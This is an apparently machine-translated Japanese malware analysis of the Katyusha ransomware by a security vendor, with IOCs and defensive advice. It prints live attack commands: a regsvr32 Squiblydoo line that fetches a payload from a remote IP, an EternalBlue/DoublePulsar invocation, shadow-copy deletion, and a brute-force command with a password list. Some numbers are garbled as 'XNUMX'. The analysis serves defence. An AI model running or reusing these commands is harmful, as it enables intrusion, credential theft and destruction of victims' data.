Quick Heal Security Labsは数ヶ月にわたり、ランサムウェアの増加を観察してきましたが、新たに興味深いランサムウェアを発見しました。このランサムウェアはファイルを暗号化し、「.katyusha」という拡張子を追加し、0.5日以内にXNUMXビットコインを要求し、支払わない場合はデータを一般公開してダウンロードさせると脅迫します。このマルウェアは、「ダブルパルサー"と"永遠の青” エクスプロイトはネットワーク上で拡散するために使用されます。また、「スクイブリードゥー” はネットワーク上で拡散します。このランサムウェアの感染経路はまだ確認されていませんが、情報源から判断すると、スピアフィッシング、マルバタイジング、スパムメール、SMBエクスプロイトなどを介してシステムに侵入する可能性があります。
テクニカル分析:
このマルウェアはMPRESS(v2.19)でパックされており、被害者のシステム上に「カチューシャ.exe” が「%temp%」にあります。このマルウェアには3つのコンポーネントが含まれています。実行されると、これらのコンポーネントは C:\Windows\Temp にドロップされ、実行が開始されます。
- Svchost0.bat
- Zkts.exe
- Ktsi.exe
Katyusha はシステム上の次のファイルをチェックし、システムがすでに感染しているかどうかを判断します。
「C:\how_to_decrypt_you_files.txt」
「C:\ProgramData\_how_to_decrypt_you_files.txt」
システムが既に感染している場合、Katyushaは図0に示すコードを含むバッチファイル(svchost1.bat)を作成し、自己コピーを削除して自身を終了します。システムが感染していない場合は、zkts.exeとktsi.exeをドロップして実行します。
Zkts.exe:
このファイルは 7zip で圧縮された実行可能ファイルであり、ネットワーク拡散モジュール、パスワード窃盗モジュールなどの複数のサブモジュールを含むメイン コンポーネントです。
zkts.exeを実行すると、「C:\ Windows \ Temp” には Mimikatz、katyusha.dll、eternal blue exploit などがあり、これらは後に Katyusha によってアクティビティを実行するために使用されます。
Ktsi.exe (暗号化者):
これはもう一つの主要コンポーネントであり、MPRESSで圧縮されたファイルです。主にファイルの暗号化と、被害者のシステムに身代金要求メッセージを表示するために使用されます。このプロセスは、図3に示すように、メインペイロード(katyusha.exe)によって独立して開始されます。
ktsi.exe を実行すると、まず、図 4 に示すように、次のタスクのリストを強制終了して、暗号化に関連するプロセスによってロックされているファイル (db ファイルなど) のハンドルを解放します。
データベース関連ファイルの暗号化を成功させるために、ktsiはデータベースアプリケーションに関連するプロセスを強制終了します。マルウェアにハードコードされているプロセスのリストは以下のとおりです。
| mysqld.exe | httpd.exe | sqlsevr.exe |
| sqlwriter.exe | w3wp.exe | sqlagent.exe |
| fdhost.exe | fdlauncher.exe | reportingservicesservice.exe |
| omtsreco.exe | tnslsnr.exe | oracle.exe |
| emagent.exe | mysqld-nt.exe |
タスクキル操作後、マルウェアはシステム起動時にすべてのユーザーが閲覧できるように、以下のパスにHTMLおよびTXT形式の身代金要求メモをドロップします。
「C:\ProgramData\Microsoft\Windows\スタートメニュー\プログラム\スタートアップ」
_how_to_decrypt_you_files.txt
ファイルの暗号化解除方法.html
「C:\ProgramData」とCドライブのルート(C:\)に、「_how_to_decrypt_you_files.txt」という身代金要求メモのみをドロップします。
Ktsi.exeは次のコマンドを実行してシャドウコピーも削除します。
「vssadmin シャドウの削除 /all /quiet」
これらのすべてのタスクの後、ktsi.exeは標準的な暗号化方法の助けを借りてファイルの暗号化(RSA)を開始します。 クリプトガムこのアルゴリズムに関連する署名は、図 7 に示すようにファイル内にあります。
以下のファイルを除くすべての拡張ファイルを暗号化します。
また、ファイルとフォルダの除外リストも含まれています(図9参照)。列挙されたファイルパスにこれらの単語が含まれている場合、そのパスは暗号化から除外されます。中断のない暗号化を実行するために、リストにはいくつかのセキュリティ製品の名前が含まれています。
拡散メカニズム:
ネットワーク拡散には、zktsから抽出されたファイルが重要な役割を果たします。抽出されたコンポーネントについては、図2を参照してください。
m32.exe と m64.exe は、Windows の lsass.exe から資格情報を取得するために使用される Mimikatz ツールです。
まず、katyusha.exe はシステム コール IsWow64Process (システムが 32 ビットの場合は 64 以外の値を返します) を使用してシステムが 64 ビットか XNUMX ビットかを判断し、システム アーキテクチャに応じて Mimikatz を実行します。
Mimikatzツールは次のファイルをドロップします。 「C:\Windows\Temp」 出力として。
– snamelog: 取得したユーザー名が含まれます。
– spasslog: 取得したユーザー名ごとのパスワードが含まれます。
mimikatz の実行後、katyusha.exe は snamelog からユーザー名を読み取り、spasslog からパスワードを読み取り、ネットワークへのブルート フォース攻撃を実行します。
Zkts.exeは、svchostb.exe、svchostb.xml、svchostbs.exe、svchostbs.xml、katyusha.dll、およびsvchostp.exeもドロップします。これらのコンポーネントは、Katyushaをネットワーク経由で拡散するために使用されます。
マルウェアは、ドロップされたEternal BlueエクスプロイトとDouble Pulsarを利用して、ネットワークに接続されたシステム上でkatyusha.dllを順次実行します。このkatyusha.exeは、以下のコマンドを使用してSMBの脆弱性を悪用します。
「C:\windows\temp\&svchostb.exe –TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –プロトコル SMB –アーキテクチャ x64 –関数 RunDLL –DllPayload katyusha.dll –TargetIp ”
Katyusha.dllは、以下のコマンドを実行するコードを含むペイロードファイルです。
「regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll」
図 12 に示すように、ファイル内にはハードコードされたコマンド文字列も見つかります。
上記のregsvr32(Microsoft Register Server)コマンドを実行すると、指定されたURLからスクリプト(katyusha.data)がダウンロードされ、regsvr32(/u)パラメータを使用してサーバーの登録解除が実行されます。これにより、以下のJavaScriptコードが実行されます。図13に示すように、ダウンロードしたスクリプトレットからタグを削除します。スクリプトには、指定されたURLからkatyusha.exeをダウンロードするコードが含まれています。 "%Temp%" ディレクトリを作成して実行します。
regsvr32コマンドを使用してC&Cからスクリプトレットをダウンロードして実行するこのような攻撃は、 「スクイブリードゥー」.
上記のアクションの後、Power Admin Tool(svchostp.exe)を使用して、ネットワーク内のシステムに対してブルートフォース攻撃を実行します。このツールはsysinternalsに似ています。 PsExecは リモートシステム上でプロセスを実行するために使用されるツールです。このランサムウェア自体には、以下に示すいくつかのユーザー名とパスワードのリストがあり、さらにMimikatz(snamelogおよびspasslog)によって取得されたユーザー名とパスワードもブルートフォース攻撃に使用します。
ユーザー名:
管理者、管理者、+snamelog の内容。
パスワード:
admin、12345、chinachina203、111、123456、qwerty、test、abc123、12345678、0000、1122、1234、+spasslog の内容。
ブルートフォースでは、カチューシャは次のコマンドを使用します。
「C:\Windows\temp\svchostp.exe -u -p -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”
上記のコマンドは、URL をパラメータとして regsvr32 ユーティリティを実行し、ペイロードをダウンロードして、katyusha.dll について上記で説明したアクティビティを実行します。
IOC:
MD5: 7f87db33980c0099739de40d1b725500
URL:
- hxxp://86.106.102.147/img/katyusha.data
- hxxp://86.106.102.147/img/katyusha.exe
ビットコインウォレットアドレス: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”
結論:
今年はランサムウェアの数が急増しており、新たな拡散手法やデータ暗号化手法が用いられています。現在、ほとんどのランサムウェアには、ネットワーク上で拡散するためのエクスプロイトやEternal Blue、Mimikatzなどのツールがバンドルされています。ユーザーの皆様には、疑わしいURLやメールへのアクセスを避け、強力なシステム認証情報を使用し、アンチウイルスソフトを最新の状態に保つことをお勧めします。
主題専門家:
Pratik Pachpor | クイックヒールセキュリティラボ
